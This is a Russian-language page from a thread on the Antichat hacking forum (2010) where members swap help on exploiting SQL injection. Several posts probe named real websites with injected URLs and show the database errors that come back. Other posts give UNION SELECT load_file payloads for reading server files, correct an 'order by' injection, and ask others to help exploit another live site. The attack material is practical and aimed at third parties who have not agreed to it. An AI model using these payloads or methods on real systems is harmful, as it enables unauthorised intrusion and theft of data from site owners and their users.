HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1238 из 2422 « Первая < 238738113811881228 1234 1235 1236 1237 1238 1239 1240 1241 1242 12481288133817382238 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.04.2010, 18:10
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию
pinch, это не та ошибка, которая говорит о иньекции.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 20.04.2010, 18:13
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию
и какое слово тут говорит что это не инъекция??? или вы сделали вывод из расчета:
http://www.turkishculturalfoundation.org//pages.php?ID=83-1
http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=1
http://www.turkishculturalfoundation.org//pages.php?ID=82+AND+1=2

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 117

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 117

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 117

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/include/lib.php on line 79



Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/www/users/turkish3/pages.php on line 297
 
Ответить с цитированием

  #3  
Старый 20.04.2010, 19:06
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию
Цитата:
Сообщение от pinch  
и какое слово тут говорит что это не инъекция???
об этом говорит хекерская догадка, смотри:
http://www.turkishculturalfoundation.org/pages.php?ID=82' ошибка есть
http://www.turkishculturalfoundation.org/pages.php?ID=82'' ошибки нет
http://www.turkishculturalfoundation.org/pages.php?ID=82''' ошибка есть
вывод=> ковычка слешируется и вырезается (остается слеш)
наглядно:
id='1\'
id='1\\'
id='1\\\'
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #4  
Старый 20.04.2010, 19:07
slayzer
Новичок
Регистрация: 30.04.2009
Сообщений: 9
С нами: 8963907

Репутация: 0
По умолчанию
Нет тут иньекции, стоит фильтрация на отбрасывание правой части.
 
Ответить с цитированием

  #5  
Старый 20.04.2010, 19:15
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию
Есть директория D:\site.ru\index.php
Как прочитать этот файл через SQL-inj?
+union+select+load_file('D:\site.ru\index.php')--
Или
+union+select+load_file('D:/site.ru/index.php')--
?
 
Ответить с цитированием

  #6  
Старый 20.04.2010, 19:22
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию
thanks=)
 
Ответить с цитированием

  #7  
Старый 20.04.2010, 19:24
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию
можно так:
+union+select+load_file('D:/site.ru/index.php')--

можно и так:
+union+select+load_file('D:\\site.ru\\index.php')--
 
Ответить с цитированием

  #8  
Старый 20.04.2010, 20:32
mental2
Познающий
Регистрация: 13.08.2007
Сообщений: 37
С нами: 9866407

Репутация: 1
По умолчанию
http://www.mzvezda.ru/type/1/51/39/
Кто поможет раскрутить?
 
Ответить с цитированием

  #9  
Старый 20.04.2010, 21:34
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию
привет посоветуйте как тут поступит:
на запрос localhost/script.php?id=1'+order+by+1+--+

ответ:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'order+by+1+--+', now())'
at line 2
вот никак не могу раскрутит еще добавка now())'
 
Ответить с цитированием

  #10  
Старый 20.04.2010, 21:40
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от YuNi|[c  
привет посоветуйте как тут поступит:
на запрос localhost/script.php?id=1'+order+by+1+--+

ответ:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'order+by+1+--+', now())'
at line 2
вот никак не могу раскрутит еще добавка now())'

localhost/script.php?id=1'%20order%20by%201--
 
Ответить с цитированием
Ответ
Страница 1238 из 2422 « Первая < 238738113811881228 1234 1235 1236 1237 1238 1239 1240 1241 1242 12481288133817382238 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.